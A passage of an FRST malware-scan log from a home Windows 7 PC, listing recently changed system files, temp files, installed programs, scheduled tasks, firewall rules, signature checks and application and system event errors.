2015-07-15 09:22 - 2015-07-01 21:30 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2015-07-15 09:22 - 2015-07-01 21:30 - 00036864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2015-07-15 09:22 - 2015-07-01 21:30 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2015-07-15 09:22 - 2015-07-01 21:30 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2015-07-15 09:22 - 2015-07-01 21:29 - 00665088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2015-07-15 09:22 - 2015-07-01 21:29 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2015-07-15 09:22 - 2015-07-01 21:29 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2015-07-15 09:22 - 2015-07-01 21:27 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2015-07-15 09:22 - 2015-07-01 21:26 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2015-07-15 09:22 - 2015-07-01 21:24 - 00686080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2015-07-15 09:22 - 2015-07-01 20:27 - 00159232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2015-07-15 09:22 - 2015-07-01 20:26 - 00290816 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2015-07-15 09:22 - 2015-07-01 20:26 - 00129024 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2015-07-15 09:22 - 2015-06-20 20:49 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2015-07-15 09:22 - 2015-06-20 20:48 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2015-07-15 09:22 - 2015-06-20 20:08 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2015-07-15 09:22 - 2015-06-20 19:26 - 02427392 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-07-15 09:22 - 2015-06-11 18:57 - 06131200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2015-07-15 09:22 - 2015-06-11 18:57 - 00856064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdvidcrl.dll
2015-07-15 09:22 - 2015-06-11 18:57 - 00053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll
2015-07-15 09:22 - 2015-06-11 18:56 - 07077376 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2015-07-15 09:22 - 2015-06-11 18:56 - 01057792 _____ (Microsoft Corporation) C:\Windows\system32\rdvidcrl.dll
2015-07-15 09:22 - 2015-06-11 18:56 - 00062976 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll
2015-07-15 09:22 - 2015-06-11 14:15 - 00429568 _____ (Microsoft Corporation) C:\Windows\system32\wksprt.exe
2015-07-15 09:22 - 2015-04-27 20:23 - 01480192 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2015-07-15 09:22 - 2015-04-27 20:23 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2015-07-15 09:22 - 2015-04-27 20:23 - 00188416 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2015-07-15 09:22 - 2015-04-27 20:23 - 00140288 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2015-07-15 09:22 - 2015-04-27 20:05 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2015-07-15 09:22 - 2015-04-27 20:04 - 01174528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2015-07-15 09:22 - 2015-04-27 20:04 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2015-07-15 09:22 - 2015-04-27 20:04 - 00103936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2015-07-15 09:21 - 2015-06-15 22:50 - 00112064 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2015-07-15 09:21 - 2015-06-15 22:45 - 03242496 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2015-07-15 09:21 - 2015-06-15 22:45 - 01941504 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2015-07-15 09:21 - 2015-06-15 22:45 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2015-07-15 09:21 - 2015-06-15 22:45 - 00070656 _____ (Microsoft Corporation) C:\Windows\system32\appinfo.dll
2015-07-15 09:21 - 2015-06-15 22:44 - 00128000 _____ (Microsoft Corporation) C:\Windows\system32\msiexec.exe
2015-07-15 09:21 - 2015-06-15 22:43 - 02364416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2015-07-15 09:21 - 2015-06-15 22:43 - 01805824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2015-07-15 09:21 - 2015-06-15 22:43 - 00337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll
2015-07-15 09:21 - 2015-06-15 22:42 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
2015-07-15 09:21 - 2015-06-15 22:42 - 00025088 _____ (Microsoft Corporation) C:\Windows\system32\msimsg.dll
2015-07-15 09:21 - 2015-06-15 22:37 - 00025088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msimsg.dll
2015-07-14 11:14 - 2015-07-14 11:16 - 00000000 ____D C:\Users\Mom\Downloads\Salvador 1986

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-08-11 23:09 - 2014-05-24 12:46 - 01724163 _____ C:\Windows\WindowsUpdate.log
2015-08-11 23:04 - 2009-07-14 06:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-08-11 23:04 - 2009-07-14 05:51 - 00099876 _____ C:\Windows\setupact.log
2015-08-11 22:48 - 2009-07-14 05:45 - 00025760 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-08-11 22:48 - 2009-07-14 05:45 - 00025760 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-08-11 22:41 - 2014-10-21 07:57 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-08-11 20:59 - 2014-11-13 21:47 - 00000000 __SHD C:\Users\Mom\AppData\Local\EmieBrowserModeList
2015-08-11 20:59 - 2014-06-24 08:31 - 00000000 __SHD C:\Users\Mom\AppData\Local\EmieUserList
2015-08-11 20:59 - 2014-06-24 08:31 - 00000000 __SHD C:\Users\Mom\AppData\Local\EmieSiteList
2015-08-11 20:41 - 2014-10-21 07:57 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2015-08-11 20:41 - 2014-09-18 13:14 - 00778440 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-08-11 20:41 - 2014-09-18 13:14 - 00142536 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-08-09 20:04 - 2014-05-24 16:38 - 00000000 ____D C:\Users\Mom\AppData\Roaming\Skype
2015-08-09 17:42 - 2009-07-14 06:13 - 00781790 _____ C:\Windows\system32\PerfStringBackup.INI
2015-08-08 21:08 - 2014-05-25 18:32 - 00000000 ____D C:\Users\Mom\AppData\Roaming\uTorrent
2015-08-07 07:51 - 2014-07-15 10:23 - 00000000 ____D C:\Users\Mom\Downloads\Simon Schama History of Britain
2015-08-04 15:29 - 2009-07-14 06:08 - 00032620 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2015-08-03 13:12 - 2014-05-24 16:11 - 00000000 ____D C:\Users\Mom\AppData\Local\Google
2015-08-01 08:38 - 2015-07-10 14:39 - 00000000 ___HD C:\$Windows.~BT
2015-08-01 08:23 - 2014-05-24 21:42 - 00000000 ____D C:\Windows\Panther
2015-07-28 09:49 - 2014-05-26 17:59 - 00000000 ___SD C:\Windows\system32\CompatTel
2015-07-27 12:35 - 2015-06-04 08:25 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-07-27 12:35 - 2014-05-27 22:36 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-07-27 12:35 - 2014-05-24 15:53 - 00306544 _____ C:\Windows\PFRO.log
2015-07-26 23:23 - 2014-05-25 19:59 - 00000000 ____D C:\Users\Mom\AppData\Roaming\vlc
2015-07-25 08:10 - 2015-04-04 12:42 - 00000000 ___SD C:\Windows\system32\GWX
2015-07-21 16:53 - 2014-05-24 16:22 - 00000000 ____D C:\ProgramData\Skype
2015-07-21 16:43 - 2009-07-14 05:45 - 00408216 _____ C:\Windows\system32\FNTCACHE.DAT
2015-07-20 15:56 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\system32\NDF
2015-07-17 09:45 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\rescache
2015-07-16 23:21 - 2015-04-04 12:42 - 00000000 ___SD C:\Windows\SysWOW64\GWX
2015-07-16 22:53 - 2014-05-24 16:13 - 00003894 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2015-07-16 22:53 - 2014-05-24 16:13 - 00003642 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2015-07-16 22:53 - 2014-05-24 16:13 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-07-16 22:53 - 2014-05-24 16:13 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-07-15 18:01 - 2014-12-10 22:50 - 00000000 ____D C:\Windows\system32\appraiser
2015-07-15 18:01 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\PolicyDefinitions
2015-07-15 10:13 - 2014-06-22 14:13 - 00000000 ____D C:\ProgramData\Microsoft Help
2015-07-15 10:04 - 2014-05-24 13:19 - 00000000 ____D C:\Windows\system32\MRT
2015-07-15 08:48 - 2014-06-14 13:19 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2015-07-15 08:45 - 2014-12-27 15:47 - 00003886 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task

==================== Files in the root of some directories =======

2014-08-15 10:12 - 2014-08-15 10:12 - 0000057 _____ () C:\ProgramData\Ament.ini

Some files in TEMP:
====================
C:\Users\Mom\AppData\Local\Temp\avgnt.exe
C:\Users\Mom\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpgmql4v.dll
C:\Users\Mom\AppData\Local\Temp\jre-7u65-windows-i586-iftw.exe
C:\Users\Mom\AppData\Local\Temp\jre-8u31-windows-au.exe
C:\Users\Mom\AppData\Local\Temp\ose00000.exe
C:\Users\Mom\AppData\Local\Temp\Quarantine.exe
C:\Users\Mom\AppData\Local\Temp\sqlite3.dll
C:\Users\Mom\AppData\Local\Temp\vlc-2.1.5-win32.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-08-08 22:24

==================== End of log ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version:11-08-2015 02
Ran by Mom (2015-08-11 23:15:22)
Running from C:\Users\Mom\Downloads
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-924763536-93737856-2869661127-500 - Administrator - Disabled)
Guest (S-1-5-21-924763536-93737856-2869661127-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-924763536-93737856-2869661127-1002 - Limited - Enabled)
Mom (S-1-5-21-924763536-93737856-2869661127-1000 - Administrator - Enabled) => C:\Users\Mom

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
AS: Microsoft Security Essentials (Enabled - Up to date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Adobe Flash Player 18 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 18.0.0.232 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.12) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.12 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.1.151 - Adobe Systems, Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 44.0.2403.130 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.28.1 - Google Inc.) Hidden
HP Photosmart 5510 series Basic Device Software (HKLM\...\{CFF43B48-42A1-4967-9506-7E341BBD075F}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.8.204.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Mozilla Firefox 39.0 (x86 en-GB) (HKLM-x32\...\Mozilla Firefox 39.0 (x86 en-GB)) (Version: 39.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 38.0.1 - Mozilla)
Mozilla Thunderbird 31.7.0 (x86 en-US) (HKLM-x32\...\Mozilla Thunderbird 31.7.0 (x86 en-US)) (Version: 31.7.0 - Mozilla)
PDF Split And Merge Basic (HKLM\...\{28336922-26D1-4638-B4D7-790A7F8F922E}) (Version: 2.2.3 - Andrea Vacondio)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
Skype™ 7.7 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.7.102 - Skype Technologies S.A.)
Soda PDF 6 View Module (x32 Version: 6.3.8.17473 - LULU Software Limited) Hidden
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Restore Points =========================

07-08-2015 13:33:25 Windows Update
08-08-2015 08:04:32 Windows Update
08-08-2015 09:13:47 Windows Update
09-08-2015 00:15:28 Windows Update
09-08-2015 19:27:41 Windows Update
09-08-2015 20:58:19 Windows Update

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 03:34 - 2009-06-10 22:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {330E5B53-B2AC-4650-B49C-E9481ADB4B06} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-05-24] (Google Inc.)
Task: {6E0FCAF8-92D8-43AF-86C9-95C14FF83A80} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-05-24] (Google Inc.)
Task: {A74A13A6-369A-4808-815C-5DB755541A80} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-07-07] (Adobe Systems Incorporated)
Task: {E2CD0FD8-B65F-45AF-A799-B9710670F741} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-08-11] (Adobe Systems Incorporated)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (Whitelisted) ==============

2013-09-05 00:17 - 2013-09-05 00:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:23 - 2010-10-20 15:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2012-01-10 21:12 - 2012-01-10 21:12 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:45 - 2010-10-20 15:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2015-08-06 07:31 - 2015-07-31 07:19 - 01405768 _____ () C:\Program Files (x86)\Google\Chrome\Application\44.0.2403.130\libglesv2.dll
2015-08-06 07:31 - 2015-07-31 07:19 - 00081224 _____ () C:\Program Files (x86)\Google\Chrome\Application\44.0.2403.130\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-924763536-93737856-2869661127-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Mom\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 194.168.4.100 - 194.168.8.100
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

MSCONFIG\Services: ehRecvr => 3
MSCONFIG\Services: ehSched => 3
MSCONFIG\Services: Fax => 3
MSCONFIG\Services: idsvc => 3
MSCONFIG\Services: LULU Software CrashHandler => 3
MSCONFIG\Services: SCardSvr => 3
MSCONFIG\Services: SCPolicySvc => 3
MSCONFIG\Services: Soda PDF 6 => 3
MSCONFIG\Services: TabletInputService => 3
MSCONFIG\Services: WMPNetworkSvc => 2
MSCONFIG\Services: WPCSvc => 3
MSCONFIG\startupfolder: C:^Users^Mom^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Dropbox.lnk => C:\Windows\pss\Dropbox.lnk.Startup
MSCONFIG\startupfolder: C:^Users^Mom^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2010 Screen Clipper and Launcher.lnk => C:\Windows\pss\OneNote 2010 Screen Clipper and Launcher.lnk.Startup
MSCONFIG\startupreg: Facebook Update => "C:\Users\Mom\AppData\Local\Facebook\Update\FacebookUpdate.exe" /c /nocrashserver
MSCONFIG\startupreg: Skype => "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{5E0C6FF5-AA8A-4452-86E4-8B5C86D10E97}] => (Allow) C:\Users\Mom\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{694FC7B7-0568-465B-A863-EC1D4891024F}] => (Allow) C:\Users\Mom\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [TCP Query User{B6F5BB14-10E2-42CF-A707-8FC453F48E66}C:\windows\kmsemulator.exe] => (Allow) C:\windows\kmsemulator.exe
FirewallRules: [UDP Query User{61DC722D-2674-4CB4-A19C-7E4D6A48C716}C:\windows\kmsemulator.exe] => (Allow) C:\windows\kmsemulator.exe
FirewallRules: [{8FFD5BB0-40B7-40C4-B6A8-8482A65AC3E7}] => (Allow) C:\Program Files\HP\HP Photosmart 5510 series\Bin\DeviceSetup.exe
FirewallRules: [{11A4EA4E-CE5D-4B13-A7B5-08248892564B}] => (Allow) C:\Program Files\HP\HP Photosmart 5510 series\Bin\HPNetworkCommunicator.exe
FirewallRules: [{15D50127-5C56-4510-882C-BC246926743C}] => (Allow) C:\Program Files\HP\HP Photosmart 5510 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [{97EA1064-EB43-41E8-B48B-EBF28046525A}] => (Allow) C:\Users\Mom\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{12668E68-B709-49C5-9E77-793A540FD51B}] => (Allow) C:\Users\Mom\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [TCP Query User{A8B4D910-9FFD-4BF5-B9B4-18506BC5B9B1}C:\users\mom\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\mom\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{E12793DF-77E6-4F0A-83EE-E53F72C89071}C:\users\mom\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\mom\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{5720D434-2F44-4AC0-89DA-8DC2E292D340}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A0771DDC-2866-4B2F-B5F9-B1ABE1C297D4}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{AED023D9-7606-4DA6-9957-E4B49634D304}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{A0AF53C4-F663-449F-9D10-E4DCAB57C230}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Faulty Device Manager Devices =============

Name: MpKsl958ccaaf
Description: MpKsl958ccaaf
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: MpKsl958ccaaf
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.


==================== Event log errors: =========================

Application errors:
==================
Error: (08/03/2015 07:43:15 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program firefox.exe version 39.0.0.5659 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: ae0

Start Time: 01d0cdaf22533202

Termination Time: 40

Application Path: C:\Program Files (x86)\Mozilla Firefox\firefox.exe

Report Id: a2b0bf1a-39aa-11e5-9c72-705ab677b1a1

Error: (07/29/2015 07:32:10 AM) (Source: ESENT) (EventID: 412) (User: )
Description: taskhost (1568) WebCacheLocal: Unable to read the header of logfile C:\Users\Mom\AppData\Local\Microsoft\Windows\WebCache\V01.log. Error -501.

Error: (07/29/2015 07:32:10 AM) (Source: ESENT) (EventID: 412) (User: )
Description: taskhost (1568) WebCacheLocal: Unable to read the header of logfile C:\Users\Mom\AppData\Local\Microsoft\Windows\WebCache\V01.log. Error -501.

Error: (07/26/2015 12:17:11 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: javaw.exe, version: 8.0.31.13, time stamp: 0x54925fd3
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000092
Fault offset: 0x0125287a
Faulting process id: 0x1190
Faulting application start time: 0xjavaw.exe0
Faulting application path: javaw.exe1
Faulting module path: javaw.exe2
Report Id: javaw.exe3

Error: (07/06/2015 08:52:56 PM) (Source: MsiInstaller) (EventID: 11721) (User: Savage)
Description: Product: Java 8 Update 31 -- Error 1721. There is a problem with this Windows Installer package. A program required for this install to complete could not be run. Contact your support personnel or package vendor. Action: installexe, location: C:\Windows\Installer\MSIE4C6.tmp, command: INSTALLDIR="C:\Program Files (x86)\Java\jre1.8.0_31\\" REPAIRMODE=1

Error: (07/03/2015 09:50:36 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program uTorrent.exe version 3.4.3.40298 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: ac8

Start Time: 01d0b5bc80f1a9c6

Termination Time: 30

Application Path: C:\Users\Mom\AppData\Roaming\uTorrent\uTorrent.exe

Report Id: 10c1ae94-21c5-11e5-9def-705ab677b1a1

Error: (06/28/2015 08:00:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: javaw.exe, version: 8.0.31.13, time stamp: 0x54925fd3
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc000008e
Fault offset: 0x1500287a
Faulting process id: 0x148c
Faulting application start time: 0xjavaw.exe0
Faulting application path: javaw.exe1
Faulting module path: javaw.exe2
Report Id: javaw.exe3

Error: (06/28/2015 07:29:50 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program Skype.exe version 7.5.0.102 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: bb4

Start Time: 01d0b1d02f0a2726

Termination Time: 31

Application Path: C:\Program Files (x86)\Skype\Phone\Skype.exe

Report Id: a3dfe66a-1dc3-11e5-9af1-705ab677b1a1

Error: (06/25/2015 07:41:15 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program uTorrent.exe version 3.4.3.40298 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: b74

Start Time: 01d0af6515faa147

Termination Time: 30

Application Path: C:\Users\Mom\AppData\Roaming\uTorrent\uTorrent.exe

Report Id: b632200e-1b69-11e5-8632-705ab677b1a1

Error: (06/25/2015 05:45:41 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program thunderbird.exe version 31.7.0.5605 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: f64

Start Time: 01d0af6539342183

Termination Time: 40

Application Path: C:\Program Files (x86)\Mozilla Thunderbird\thunderbird.exe

Report Id: 8832c5c8-1b59-11e5-8632-705ab677b1a1


System errors:
=============
Error: (08/11/2015 11:15:33 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (08/11/2015 11:15:33 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (08/11/2015 11:15:33 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

